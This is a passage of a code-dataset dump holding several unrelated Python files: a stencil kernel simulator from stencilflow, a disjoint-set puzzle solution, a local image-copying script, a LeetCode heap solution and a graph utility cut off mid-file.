super().__init__(name, BoundedQueue(name=\"dummy\", maxsize=0), data_type)\n # store arguments\n self.kernel_string: str = kernel_string # raw kernel string input\n self.raw_inputs = raw_inputs\n self.dimensions: List[\n int] = dimensions # input array dimensions [dimX, dimY, dimZ]\n self.boundary_conditions: Dict[str, Dict[\n str, str]] = boundary_conditions # boundary_conditions[field_name]\n self.verbose = verbose\n self.vectorization = vectorization\n # read static parameters from config\n self.config: Dict = stencilflow.parse_json(\"kernel.config\")\n self.calculator: Calculator = Calculator()\n # set simulator initial parameters\n self.all_available = False\n self.not_available = set()\n # analyze input\n self.graph: ComputeGraph = ComputeGraph(vectorization=vectorization,\n dimensions=dimensions,\n raw_inputs=raw_inputs)\n self.graph.generate_graph(\n kernel_string\n ) # generate the ast computation graph from the mathematical expression\n self.graph.calculate_latency(\n ) # calculate the latency in the computation tree to find the critical path\n self.graph.determine_inputs_outputs(\n ) # sort out input nodes (field accesses and constant values) and output\n # nodes\n self.graph.setup_internal_buffers()\n # set plot path (if plot is set to True)\n if plot_graph:\n self.graph.plot_graph(name + \".png\")\n # init sim specific params\n self.var_map: Dict[str, float] = dict(\n ) # mapping between variable names and its (current) value: var_map[var_name] =\n # var_value\n self.read_success: bool = False # flag indicating if read has been successful from all input nodes (=> ready\n # to execute)\n self.exec_success: bool = False # flag indicating if the execution has been successful\n self.result: float = float(\n 'nan'\n ) # execution result of current iteration (see program counter)\n self.outputs: Dict[str, BoundedQueue] = dict()\n # output delay queue: for simulation of calculation latency, fill it up with bubbles\n self.out_delay_queue: BoundedQueue = BoundedQueue(\n name=\"delay_output\",\n maxsize=self.graph.max_latency + 1,\n collection=[None] * self.graph.max_latency)\n # setup internal buffer queues\n self.internal_buffer: Dict[str, BoundedQueue] = dict()\n self.setup_internal_buffers()\n # this method takes care of the (falsely) executed kernel in case of not having a field access at [0,0,0]\n # present and the implication that there might be only fields out of bound s.t. there is a result produced,\n # but there should not be a result yet (see paper example ref# TODO)\n self.dist_to_center: Dict = dict()\n self.set_up_dist_to_center()\n self.center_reached = False\n # add performance metric fields\n self.max_del_buf_usage = dict()\n # for mean\n self.buf_usage_sum = dict()\n self.buf_usage_num = dict()\n self.init_metric = False\n self.PC_exec_start = stencilflow.convert_3d_to_1d(\n dimensions=self.dimensions, index=self.dimensions) # upper bound\n self.PC_exec_end = 0 # lower bound\n\n def print_kernel_performance(self):\n \"\"\"\n Print performance metric data.\n \"\"\"\n print(\"#############################\")\n for input in set(self.inputs).union(set(self.outputs)):\n print(\"#############################\")\n print(\"input buffer name: {}\".format(input))\n print(\"max buffer usage: {}\".format(self.max_del_buf_usage[input]))\n print(\"average buffer usage: {}\".format(self.buf_usage_sum[input] /\n self.buf_usage_num[input]))\n print(\"total execution time (from first exec to last): {}\".format(\n self.PC_exec_end - self.PC_exec_start))\n\n def update_performance_metric(self):\n \"\"\"\n Update buffer size values for performance evalution purpose.\n \"\"\"\n # check if dict has been initialized\n if not self.init_metric:\n # init all keys\n for input in self.inputs:\n self.max_del_buf_usage[input] = 0\n self.buf_usage_num[input] = 0\n self.buf_usage_sum[input] = 0\n for output in self.outputs:\n self.max_del_buf_usage[output] = 0\n self.buf_usage_num[output] = 0\n self.buf_usage_sum[output] = 0\n # update maximum delay buf usage\n # inputs\n for input in self.inputs:\n buffer = self.inputs[input]\n self.max_del_buf_usage[input] = max(\n self.max_del_buf_usage[input],\n len([x for x in buffer['delay_buffer'].queue if x is not None]))\n self.buf_usage_num[input] += 1\n self.buf_usage_sum[input] += len(\n [x for x in buffer['delay_buffer'].queue if x is not None])\n # outputs\n for output in self.outputs:\n buffer = self.outputs[output]\n self.max_del_buf_usage[output] = max(\n self.max_del_buf_usage[output],\n len([x for x in buffer['delay_buffer'].queue if x is not None]))\n self.buf_usage_num[output] += 1\n self.buf_usage_sum[output] += len(\n [x for x in buffer['delay_buffer'].queue if x is not None])\n\n def set_up_dist_to_center(self):\n \"\"\"\n Computes for all fields/channels the distance from the furthest field access to the center of the stencil\n ([0,0,0,]).\n \"\"\"\n for item in self.graph.accesses:\n furthest = max(self.graph.accesses[item])\n self.dist_to_center[item] = stencilflow.convert_3d_to_1d(\n dimensions=self.dimensions, index=furthest)\n\n def iter_comp_tree(self,\n node: BaseOperationNodeClass,\n index_relative_to_center=True,\n replace_negative_index=False,\n python_syntax=False,\n flatten_index=True,\n output_dimensions=None) -> str:\n \"\"\"\n Iterate through the computation tree in order to generate the kernel string (according to some properties\n e.g. relative to center or replace negative index.\n :param node: current node in the tree\n :param index_relative_to_center: indication wheter the zero index should be at the center of the stencil or the\n furthest element\n :param replace_negative_index: replace the negativ sign '-' by n in order to create variable names that are not\n being split up by the python expression parser (Calculator)\n :return: computation string of the subgraph\n \"\"\"\n # get predecessor list\n pred = list(self.graph.graph.pred[node])\n # differentiate cases for each node type\n if isinstance(node, BinOp): # binary operation\n # extract expression elements\n if len(pred) == 1: # lhs == rhs:\n lhs, rhs = pred[0], pred[0]\n else:\n lhs = pred[0] # left hand side\n rhs = pred[1] # right hand side\n # recursively compute the child string\n lhs_str = self.iter_comp_tree(lhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n rhs_str = self.iter_comp_tree(rhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n # return formatted string\n return \"({} {} {})\".format(lhs_str, node.generate_op_sym(), rhs_str)\n elif isinstance(node, Call): # function call\n # extract expression element\n expr = pred[0]\n # recursively compute the child string\n expr_str = self.iter_comp_tree(expr, index_relative_to_center,\n replace_negative_index,\n python_syntax)\n # return formatted string\n return \"{}({})\".format(node.name, expr_str)\n elif isinstance(node, Name) or isinstance(node, Num):\n # return formatted string\n return str(node.name) # variable name\n elif isinstance(node, Subscript):\n # compute correct indexing according to the flag\n if index_relative_to_center:\n dim_index = node.index\n else:\n dim_index = stencilflow.list_subtract_cwise(\n node.index, self.graph.max_index[node.name])\n # break down index from 3D (i.e. [X,Y,Z]) to 1D\n if flatten_index:\n # TODO\n if node.name in self.input_paths and self.inputs[\n node.name][\"input_dims\"] is not None:\n ind = [\n x if x in self.inputs[node.name][\"input_dims\"] else None\n for x in stencilflow.ITERATORS\n ]\n num_dim = stencilflow.num_dims(ind)\n #dim_index = dim_index[len(self.dimensions) - num_dim:]\n new_ind, i = list(), 0\n for entry in ind:\n if entry is None:\n new_ind.append(None)\n else:\n new_ind.append(dim_index[i])\n i += 1\n dim_index = dim_index #list(map(lambda x, y: y if x is not None else None, ind, new_ind))\n word_index = stencilflow.convert_3d_to_1d(\n dimensions=self.dimensions, index=dim_index)\n # replace negative sign if the flag is set\n if replace_negative_index and word_index < 0:\n return node.name + \"[\" + \"n\" + str(abs(word_index)) + \"]\"\n else:\n return node.name + \"[\" + str(word_index) + \"]\"\n else:\n try:\n dim_index = [\n dim_index[stencilflow.ITERATORS.index(i)]\n for i in self.inputs[node.name][\"input_dims\"]\n ]\n except (KeyError, TypeError):\n pass # input_dim not defined or is None\n if len(dim_index) > output_dimensions:\n for i in range(3 - output_dimensions):\n if dim_index[i] != 0:\n raise ValueError(\"Removed used index dimension\")\n dim_index = dim_index[3 - output_dimensions:]\n return node.name + str(dim_index)\n elif isinstance(\n node, Ternary\n ): # ternary operator of the form true_expr if comp else false_expr\n # extract expression elements\n compare = [x for x in pred if type(x) == Compare][0] # comparison\n lhs = [x for x in pred if type(x) != Compare][0] # left hand side\n rhs = [x for x in pred if type(x) != Compare][1] # right hand side\n # recursively compute the child string\n compare_str = self.iter_comp_tree(compare, index_relative_to_center,\n replace_negative_index,\n python_syntax, flatten_index,\n output_dimensions)\n lhs_str = self.iter_comp_tree(lhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n rhs_str = self.iter_comp_tree(rhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n # return formatted string\n if python_syntax:\n return \"(({}) if ({}) else ({}))\".format(\n lhs_str, compare_str, rhs_str)\n else: # C++ ternary operator syntax\n return \"(({}) ? ({}) : ({}))\".format(compare_str, lhs_str,\n rhs_str)\n elif isinstance(node, Compare): # comparison\n # extract expression element\n lhs = pred[0]\n rhs = pred[1]\n # recursively compute the child string\n lhs_str = self.iter_comp_tree(lhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n rhs_str = self.iter_comp_tree(rhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n # return formatted string\n return \"{} {} {}\".format(lhs_str, str(node.name), rhs_str)\n elif isinstance(node, UnaryOp): # unary operations e.g. negation\n # extract expression element\n expr = pred[0]\n # recursively compute the child string\n expr_str = self.iter_comp_tree(\n node=expr,\n index_relative_to_center=index_relative_to_center,\n replace_negative_index=replace_negative_index,\n python_syntax=python_syntax,\n flatten_index=flatten_index,\n output_dimensions=output_dimensions)\n # return formatted string\n return \"({}{})\".format(node.generate_op_sym(), expr_str)\n else:\n raise NotImplementedError(\n \"iter_comp_tree is not implemented for node type {}\".format(\n type(node)))\n\n def generate_relative_access_kernel_string(self,\n relative_to_center=True,\n replace_negative_index=False,\n python_syntax=False,\n flatten_index=True,\n output_dimensions=None) -> str:\n \"\"\"\n Generates the relative (either to the center or to the furthest field access) access kernel string which\n is necessary for the code generator HLS tool.\n :param relative_to_center: if true, the center is at zero, otherwise the furthest access is at zero\n :param replace_negative_index: if true, all negative access signs e.g. arrA_-20 gets replaced by n e.g.\n arrA_n20 in order to be correctly recognised as a single variable name.\n :return: the generated relative access kernel string\n \"\"\"\n # format: 'output = vdc[index1] + vout[index2]'\n res = []\n # treat named nodes\n for n in self.graph.graph.nodes:\n if isinstance(n, Name) and n.name not in self.input_paths:\n if len(self.graph.graph.pred[n]) == 0:\n # This has no inputs, and must be a constant\n continue\n res.append(n.name + \" = \" + self.iter_comp_tree(\n list(self.graph.graph.pred[n])[0], relative_to_center,\n replace_negative_index, python_syntax, flatten_index,\n output_dimensions))\n # treat output node(s)\n output_node = [\n n for n in self.graph.graph.nodes if isinstance(n, Output)\n ]\n if len(output_node) != 1:\n raise Exception(\"Expected a single output node\")\n output_node = output_node[0]\n # concatenate the expressions\n res.append(self.name + \" = \" + self.iter_comp_tree(\n node=list(self.graph.graph.pred[output_node])[0],\n index_relative_to_center=relative_to_center,\n replace_negative_index=replace_negative_index,\n python_syntax=python_syntax,\n flatten_index=flatten_index,\n output_dimensions=output_dimensions))\n return \"; \".join(res)\n\n def reset_old_compute_state(self) -> None:\n \"\"\"\n Reset the internal kernel simulator state in order to be prepared for the next iteration.\n \"\"\"\n self.var_map = dict()\n self.read_success = False\n self.exec_success = False\n self.result = None\n\n def remove_duplicate_accesses(self, inp: List) -> List:\n \"\"\"\n Remove duplicate accesses of the given input array.\n :param inp: List with duplicates.\n :return: List without duplicates.\n \"\"\"\n tuple_set = set(tuple(row) for row in inp)\n return [list(t) for t in tuple_set]\n\n def setup_internal_buffers(self) -> None:\n \"\"\"\n Create and split the internal buffers according to the pipline model (see paper example ref# TODO)\n :return:\n \"\"\"\n # remove duplicate accesses\n for item in self.graph.accesses:\n self.graph.accesses[item] = self.remove_duplicate_accesses(\n self.graph.accesses[item])\n # slice the internal buffer into junks of accesses\n for buf_name in self.graph.buffer_size:\n # create empty list and sort the accesses according to their relative position\n self.internal_buffer[buf_name]: List[BoundedQueue] = list()\n list.sort(self.graph.accesses[buf_name], reverse=True)\n # split according to the cases\n if len(self.graph.accesses[buf_name]) == 0: # empty list\n pass\n elif len(self.graph.accesses[buf_name]) == 1: # single entry list\n # this line would add an additional internal buffer for fields that only have a single access\n self.internal_buffer[buf_name].append(\n BoundedQueue(name=buf_name, maxsize=1, collection=[None]))\n else: # many entry list\n # iterate through all of them and split them into correct sizes\n itr = self.graph.accesses[buf_name].__iter__()\n pre = itr.__next__()\n for item in itr:\n curr = item\n # calculate size of buffer\n diff = abs(\n stencilflow.convert_3d_to_1d(\n index=stencilflow.list_subtract_cwise(pre, curr),\n dimensions=self.dimensions))\n if diff == 0: # two accesses on same field\n pass\n else:\n self.internal_buffer[buf_name].append(\n BoundedQueue(name=buf_name,\n maxsize=diff,\n collection=[None] * diff))\n pre = curr\n\n def buffer_position(self, access: BaseKernelNodeClass) -> int:\n \"\"\"\n Computes the offset position within the buffer list\n :param access: the access index we want to know the buffer position\n :return: the offset from the access\n \"\"\"\n return self.convert_3d_to_1d(\n self.graph.min_index[access.name]) - self.convert_3d_to_1d(\n access.index)\n\n def index_to_ijk(self, index: List[int]):\n \"\"\"\n Creates a string of the access (for variable name generation).\n :param index: access\n :return: created string\n \"\"\"\n # current implementation only supports 3 dimension (default)\n if len(index) == 3:\n \"\"\"\n # v1:\n return \"[i{},j{},k{}]\".format(\n \"\" if index[0] == 0 else \"+{}\".format(index[0]),\n \"\" if index[1] == 0 else \"+{}\".format(index[1]),\n \"\" if index[2] == 0 else \"+{}\".format(index[2])\n )\n # v2:\n return \"_{}_{}_{}\".format(index[0], index[1], index[2])\n \"\"\"\n # compute absolute index\n ind = stencilflow.convert_3d_to_1d(dimensions=self.dimensions,\n index=index)\n # return formatted string\n return \"_{}\".format(ind) if ind >= 0 else \"_n{}\".format(abs(ind))\n else:\n raise NotImplementedError(\n \"Method index_to_ijk has not been implemented for |indices|!=3, here: |indices|={}\"\n .format(len(index)))\n\n def buffer_number(self, node: Subscript):\n \"\"\"\n Computes the index within the internal buffer array for accessing the input node.\n :param node: input node\n :return: index (-1: delay buffer, >= 0: internal buffer index)\n \"\"\"\n # select all matching inputs\n selected = [x.index for x in self.graph.inputs if x.name == node.name]\n # remove duplicates\n selected_unique = self.remove_duplicate_accesses(selected)\n # sort them to have them ordered by the access\n ordered = sorted(selected_unique, reverse=True)\n # get the position within the sorted list\n result = ordered.index(node.index)\n return result - 1\n\n def get_global_kernel_index(self) -> List[int]:\n \"\"\"\n Return the current position (simulator, program counter) within the comutation as a list of the form\n [i,j,k].\n :return: current global kernel position as [i,j,k]\n \"\"\"\n # get dimensions and PC\n index = self.dimensions\n number = self.program_counter\n # convert the absolute value (PC) to its corresponding position in the given 3D space.\n n = len(index)\n all_dim = functools.reduce(operator.mul, index,\n 1) // index[0] # integer arithmetic\n output = list()\n for i in range(1, n + 1):\n output.append(number // all_dim)\n number -= output[-1] * all_dim\n if i < n:\n all_dim = all_dim // index[i]\n return output\n\n def is_out_of_bound(self, index: List[int]) -> bool:\n \"\"\"\n Checks whether the current access is within bounds or not.\n :param index: access index\n :return: true: within bounds, false: otherwise\n \"\"\"\n # check all dimensions boundary\n for i in range(len(index)):\n if index[i] < 0 or index[i] >= self.dimensions[i]:\n return True\n return False\n\n def get_data(self, inp: Subscript, global_index: List[int],\n relative_index: List[int]):\n \"\"\"\n Returns data of current stencil access (could be real data or boundary condition)\n :param inp: array field access\n :param global_index: center location of current stencil\n :param relative_index: offset from center of stencil\n :return: data\n \"\"\"\n # get the access index\n access_index = stencilflow.list_add_cwise(global_index, relative_index)\n \"\"\"\n Boundary Condition\n \"\"\"\n # check if it is within bounds\n if self.is_out_of_bound(access_index):\n if self.boundary_conditions[inp.name][\"type\"] == \"constant\":\n return self.boundary_conditions[inp.name][\"value\"]\n elif self.boundary_conditions[inp.name][\"type\"] == \"copy\":\n raise NotImplementedError(\n \"Copy boundary conditions have not been implemented yet.\")\n else:\n raise NotImplementedError(\n \"We currently do not support boundary conditions of type {}\"\n .format(self.boundary_conditions[inp.name][\"type\"]))\n \"\"\"\n Data Access\n \"\"\"\n # get index position within the buffers\n pos = self.buffer_number(inp)\n if pos == -1: # delay buffer\n return self.inputs[inp.name][\"delay_buffer\"].try_peek_last()\n elif pos >= 0: # internal buffer\n return self.inputs[inp.name][\"internal_buffer\"][pos].try_peek_last()\n\n def test_availability(self):\n \"\"\"\n Check if all accesses are available (=> ready for execution). In addition to that, the method delivers all\n accesses that are not available yet.\n :return: true: all available, false: otherwise\n \"\"\"\n # set initial value and init set\n all_available = True\n self.not_available = set()\n # iterate through all inputs\n for inp in self.graph.inputs:\n # case split for types\n if isinstance(inp, Num): # numerals are always available\n pass\n elif len(self.inputs[inp.name]\n ['internal_buffer']) == 0: # no internal buffer\n pass\n elif isinstance(inp, Subscript): # normal subscript access\n # get current internal state position in [i,j,k] format\n gki = self.get_global_kernel_index()\n # check bound, out of bound is handled by the boundary condition automatically (always available for\n # constant)\n if self.is_out_of_bound(\n stencilflow.list_add_cwise(inp.index, gki)):\n pass\n else: # within bounds\n # get position and check if the value (not None) is available\n index = self.buffer_number(inp)\n if index == -1: # delay buffer\n if self.inputs[inp.name]['delay_buffer'].try_peek_last() is None or \\\n self.inputs[inp.name]['delay_buffer'].try_peek_last() is False:\n all_available = False\n self.not_available.add(inp.name)\n elif 0 <= index < len(self.inputs[\n inp.name]['internal_buffer']): # internal buffer\n if self.inputs[inp.name]['internal_buffer'][index].try_peek_last() is False \\\n or self.inputs[inp.name]['internal_buffer'][index].try_peek_last() is None:\n all_available = False\n self.not_available.add(inp.name)\n else:\n raise Exception(\"index out of bound: {}\".format(index))\n\n return all_available\n\n def move_forward(self, items: Dict[str, Dict]) -> None:\n \"\"\"\n Move all items within the internal and delay buffer one element forward.\n :param items:\n :return:\n \"\"\"\n # move all forward\n for name in items:\n if len(items[name]['internal_buffer']) == 0: # no internal buffer\n pass\n elif len(self.inputs[name]\n ['internal_buffer']) == 1: # single internal buffer\n items[name]['internal_buffer'][0].dequeue()\n items[name]['internal_buffer'][0].enqueue(\n items[name]['delay_buffer'].dequeue())\n else: # many internal buffers\n # iterate over them and move all one forward\n index = len(items[name]['internal_buffer']) - 1\n pre = items[name]['internal_buffer'][index - 1]\n next = items[name]['internal_buffer'][index]\n next.dequeue()\n while index > 0:\n next.enqueue(pre.dequeue())\n next = pre\n index -= 1\n pre = items[name]['internal_buffer'][index - 1]\n items[name]['internal_buffer'][0].enqueue(\n items[name]['delay_buffer'].dequeue())\n\n def decrement_center_reached(self):\n \"\"\"\n Decrement counter for reaching the center. As soon as this counter reaches zero, the computed output values\n are valid and should be forwarded to the successors channels.\n \"\"\"\n # decrement all\n for item in self.dist_to_center:\n if self.inputs[item]['delay_buffer'].try_peek_last() is not None:\n self.dist_to_center[item] -= 1\n\n def try_read(self) -> bool:\n \"\"\"\n This is the implementation of the kernel reading functionality of the simulator. It tries to read from all\n input channels and indicates if this has been done with success.\n \"\"\"\n # check if all inputs are available\n self.all_available = self.test_availability()\n # get all values and put them into the variable map\n if self.all_available:\n for inp in self.graph.inputs:\n # read inputs into var_map\n if isinstance(inp, Num): # case numerals\n self.var_map[inp.name] = float(inp.name)\n elif isinstance(inp, Name): # case variable names\n # get value from internal_buffer\n try:\n # check for duplicate\n if not self.var_map.__contains__(inp.name):\n self.var_map[inp.name] = self.internal_buffer[\n inp.name].peek(self.buffer_position(inp))\n except Exception as ex: # do proper diagnosis\n self.diagnostics(ex)\n elif isinstance(inp, Subscript): # case array accesses\n # get value from internal buffer\n try:\n name = inp.name + self.index_to_ijk(inp.index)\n if not self.var_map.__contains__(name):\n self.var_map[name] = self.get_data(\n inp=inp,\n global_index=self.get_global_kernel_index(),\n relative_index=inp.index)\n except Exception as ex: # do proper diagnosis\n self.diagnostics(ex)\n # set kernel flag indicating the the read has been successful\n self.read_success = self.all_available\n # test center reached\n self.decrement_center_reached()\n self.center_reached = True\n for item in self.dist_to_center:\n if self.dist_to_center[item] >= 0:\n self.center_reached = False\n # either move all inputs forward or those that are not available yet\n if self.center_reached:\n if self.all_available:\n self.move_forward(self.inputs)\n else:\n not_avail_dict = dict()\n for item in self.not_available:\n not_avail_dict[item] = self.inputs[item]\n self.move_forward(not_avail_dict)\n else:\n not_reached_dict = dict()\n for item in self.dist_to_center:\n if self.dist_to_center[item] >= 0:\n not_reached_dict[item] = self.inputs[item]\n self.move_forward(not_reached_dict)\n return self.all_available\n\n def try_execute(self):\n \"\"\"\n This is the implementation of the kernel execution functionality of the simulator. It executes the stencil\n computation for the current variable mapping that was set up by the try_read() function.\n \"\"\"\n # check if read has been succeeded\n if self.center_reached and self.read_success and 0 <= self.program_counter < functools.reduce(\n operator.mul, self.dimensions, 1):\n # execute calculation\n try:\n # get computation string\n computation = self.generate_relative_access_kernel_string(relative_to_center=True,\n replace_negative_index=True,\n python_syntax=True) \\\n .replace(\"[\", \"_\").replace(\"]\", \"\").replace(\" \", \"\")\n # compute result and\n self.result = self.data_type(\n self.calculator.eval_expr(self.var_map, computation))\n # write result to latency-simulating buffer\n self.out_delay_queue.enqueue(self.result)\n # update performance metric\n self.PC_exec_start = min(self.PC_exec_start,\n self.program_counter)\n self.PC_exec_end = max(self.PC_exec_end, self.program_counter)\n # increment the program counter\n self.program_counter += 1\n except Exception as ex: # do proper diagnosis upon an exception\n self.diagnostics(ex)\n else:\n # write bubble to latency-simulating buffer\n self.out_delay_queue.enqueue(None)\n\n def try_write(self):\n \"\"\"\n This is the implementation of the kernel write functionality of the simulator. It writes the output element to\n its successor channels.\n \"\"\"\n # read last element of the delay queue\n data = self.out_delay_queue.dequeue()\n # write result to all output queues\n for outp in self.outputs:\n try:\n self.outputs[outp][\"delay_buffer\"].enqueue(\n data) # use delay buffer to be consistent with others,\n # delay buffer is used to write to the output data queue here\n except Exception as ex: # do proper diagnosis upon an exception\n self.diagnostics(ex)\n\n def diagnostics(self, ex: Exception) -> None:\n \"\"\"\n Interface for error overview reporting (gets called in case of an exception)\n\n - goal:\n - get an overview over the whole stencil chain state in case of an error\n - maximal and current size of all buffers\n - type of phase (saturation/execution)\n - efficiency (#execution cycles / #total cycles)\n :param ex: the exception that arose\n \"\"\"\n print(\"#####################################\")\n print(\"Diagnosis output of kernel {}\".format(self.name))\n print(\"Program Counter: {}\".format(self.program_counter))\n print(\"All inputs available? {}\".format(self.all_available))\n print(\"Center reached? {}\".format(self.center_reached))\n print(\"Exception traceback:\")\n if ex is not None:\n import traceback\n try:\n raise ex\n except Exception:\n print(traceback.format_exc()) # inputs\n for input in self.inputs:\n buffer = self.inputs[input]\n print(\"Buffer info from input {}\".format(input))\n # delay buffer\n print(\"Delay buffer max size: {}, current size: {}\".format(\n buffer['delay_buffer'].maxsize, buffer['delay_buffer'].size()))\n print(\"Delay buffer data: {}\".format(buffer['delay_buffer'].queue))\n # internal buffer\n data = list(map(lambda x: x.queue, buffer['internal_buffer']))\n print(\"Internal buffer data: {}\".format(data))\n # latency sim buffer\n print(\"Latency simulation buffer data: {}\".format(\n self.out_delay_queue.queue))\n # output\n for output in self.outputs:\n buffer = self.outputs[output]\n print(\"Buffer info from output {}\".format(output))\n # delay buffer\n print(\"Delay buffer max size: {}, current size: {}\".format(\n buffer['delay_buffer'].maxsize, buffer['delay_buffer'].size()))\n print(\"Delay buffer data: {}\".format(buffer['delay_buffer'].queue))\n # internal buffer\n data = list(map(lambda x: x.queue, buffer['internal_buffer']))\n print(\"Internal buffer data: {}\".format(data))\n\n\nif __name__ == \"__main__\":\n \"\"\"\n simple test kernel for debugging\n \"\"\"\n # global dimensions\n dim = [100, 100, 100]\n # instantiate kernel\n kernel = Kernel(\n name=\"b\",\n kernel_string=\n \"b = a[i+1,j+1,k+1] + a[i+1,j,k] + a[i-1,j-1,k-1] + a[i+1,j+1,k] + (-a[i,j,k])\",\n dimensions=dim,\n boundary_conditions={\"a\": {\n \"type\": \"constant\",\n \"value\": 0.0\n }},\n data_type=dace.dtypes.float64)\n print(\"Kernel string conversion:\")\n print(\"dimensions are: {}\".format(dim))\n print(kernel.kernel_string)\n print(\n kernel.generate_relative_access_kernel_string(relative_to_center=False))\n print()\n","repo_name":"spcl/stencilflow","sub_path":"stencilflow/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":38842,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"17088868885","text":"from typing import List\nclass DisjointSet:\n def __init__(self, n):\n self.rank = [0]*(n+1)\n self.size = [1]*(n+1)\n self.parent = [i for i in range(n+1)]\n \n def find(self, node):\n if node == self.parent[node]:\n return node\n self.parent[node] = self.find(self.parent[node])\n return self.parent[node]\n \n def unionSize(self, u, v):\n paru = self.find(u)\n parv = self.find(v)\n \n if paru == parv:\n return\n \n if self.size[paru] < self.size[parv]:\n self.parent[paru] = parv\n self.size[parv] += self.size[paru]\n else:\n self.parent[parv] = paru\n self.size[paru] += self.size[parv]\n\nclass Solution:\n def MaxConnection(self, grid : List[List[int]]) -> int:\n def isvalid(p, q):\n return 0<=p None:\n pass\n def Input(self,n,m):\n matrix=[]\n #matrix input\n for _ in range(n):\n matrix.append([int(i) for i in input().strip().split()])\n return matrix\n def Print(self,arr):\n for i in arr:\n for j in i:\n print(j,end=\" \")\n print()\n\n\nif __name__==\"__main__\":\n t = int(input())\n for _ in range(t):\n \n n = int(input())\n \n \n grid=IntMatrix().Input(n, n)\n \n obj = Solution()\n res = obj.MaxConnection(grid)\n \n print(res)\n \n\n# } Driver Code Ends","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"Maximum Connected group - GFG/maximum-connected-group.py","file_name":"maximum-connected-group.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4337798046","text":"import json\nimport os\nimport shutil\n\n\ndef is_contains_chinese(strs):\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n return True\n return False\n\n\ndef copy300times(dir, imgs):\n for i in range(450, 700):\n destination = dir + \"\\\\\" + str(i) + \".jpg\"\n shutil.copy(imgs, destination)\n\n\nif __name__ == '__main__':\n\n root_path = \"D:\\\\LOL_DATA\\\\avatar_en\"\n for directory in os.listdir(root_path):\n for imgs in os.listdir(root_path + \"\\\\\" + directory):\n copy300times(root_path + \"\\\\\" + directory,\n root_path + \"\\\\\" + directory + \"\\\\\" + imgs)\n","repo_name":"AaronYang2333/LOL_Overlay_Assistant_Tool","sub_path":"gen_pics/copy_300_pic.py","file_name":"copy_300_pic.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"37"} +{"seq_id":"4367891167","text":"# leetcode submit region begin(Prohibit modification and deletion)\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n # 二分\n def furthestBuilding(self, heights: List[int], bricks: int, ladders: int) -> int:\n def canAchieve(index: int) -> bool:\n deltas = []\n t = bricks\n for i in range(index):\n if heights[i] < heights[i + 1]:\n heapq.heappush(deltas, -(heights[i + 1] - heights[i]))\n for i in range(ladders):\n if deltas:\n heapq.heappop(deltas)\n for i in deltas:\n t += i\n if t < 0:\n return False\n return True\n\n left, right = 0, len(heights) - 1\n while left <= right:\n mid = (left + right) // 2\n if canAchieve(mid):\n left = mid + 1\n else:\n right = mid - 1\n return right\n\n # 贪心\n def furthestBuilding2(self, heights: List[int], bricks: int, ladders: int) -> int:\n n = len(heights)\n pq = []\n for i in range(n - 1):\n if heights[i] < heights[i + 1]:\n heapq.heappush(pq, (heights[i + 1] - heights[i]))\n if len(pq) > ladders:\n bricks -= heapq.heappop(pq)\n if bricks < 0:\n return i\n return n - 1\n\n\n# leetcode submit region end(Prohibit modification and deletion)\nprint(Solution().furthestBuilding2([4, 2, 7, 6, 9, 14, 12], 5, 1) == 4)\nprint(Solution().furthestBuilding([4, 12, 2, 7, 3, 18, 20, 3, 19], 10, 2) == 7)\nprint(Solution().furthestBuilding([14, 3, 19, 3], 17, 0) == 3)\nprint(Solution().furthestBuilding([1, 5, 1, 2, 3, 4, 10000], 4, 1) == 5)\n","repo_name":"Howloong/Leetcode","sub_path":"python/leetcode/editor/cn/P1642_FurthestBuildingYouCanReach.py","file_name":"P1642_FurthestBuildingYouCanReach.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15810021275","text":"import numpy as np\nimport networkx as nx\n\nfrom basic.util import exclusive_combine\n\n\nclass MyGraph(object):\n def __init__(self, path, edgelist=True):\n self.neighbor_dict = {}\n if edgelist:\n fin = open(path, 'r')\n for l in fin.readlines():\n e = l.split()\n i, j = int(e[0]), int(e[1])\n self.update_edge(i, j)\n self.update_edge(j, i)\n fin.close()\n\n for key in self.neighbor_dict.keys():\n self.neighbor_dict[key] = list(self.neighbor_dict[key])\n\n self.node_list = list(self.neighbor_dict.keys())\n self.node_list.sort()\n self.node_num = len(self.node_list)\n\n def update_edge(self, i, j):\n if i in self.neighbor_dict:\n self.neighbor_dict[i].add(j)\n else:\n self.neighbor_dict[i] = {j}\n\n if j in self.neighbor_dict:\n self.neighbor_dict[j].add(i)\n else:\n self.neighbor_dict[j] = {i}\n\n def get_batches(self, batch_size):\n # np.random.seed(1)\n np.random.shuffle(self.node_list)\n num_batches = self.node_num // batch_size\n batch_list = []\n\n for n in range(num_batches):\n batch_list.append(self.node_list[n * batch_size: (n + 1) * batch_size])\n\n if self.node_num > num_batches * batch_size:\n batch_list.append(self.node_list[num_batches * batch_size:])\n\n self.node_list.sort()\n return batch_list\n\n def get_neighbors(self, in_list):\n neighbors = [self.neighbor_dict[i] for i in in_list]\n return exclusive_combine(neighbors)\n\n def diffuse(self, step, nodes):\n cur_list = nodes\n scale_list = [cur_list]\n for s in range(step):\n neighbors = self.get_neighbors(cur_list)\n cur_list = exclusive_combine([cur_list, neighbors])\n scale_list.append(cur_list)\n return scale_list # From now to the past\n\n def statistic(self):\n neigh_num = []\n for n in self.node_list:\n neigh_num.append(len(self.neighbor_dict[n]))\n\n return np.max(neigh_num), np.min(neigh_num), np.mean(neigh_num)\n\nif __name__ == '__main__':\n path = '/home/hezhicheng/data/ne_clean/cora-2211/edges.txt'\n # labels 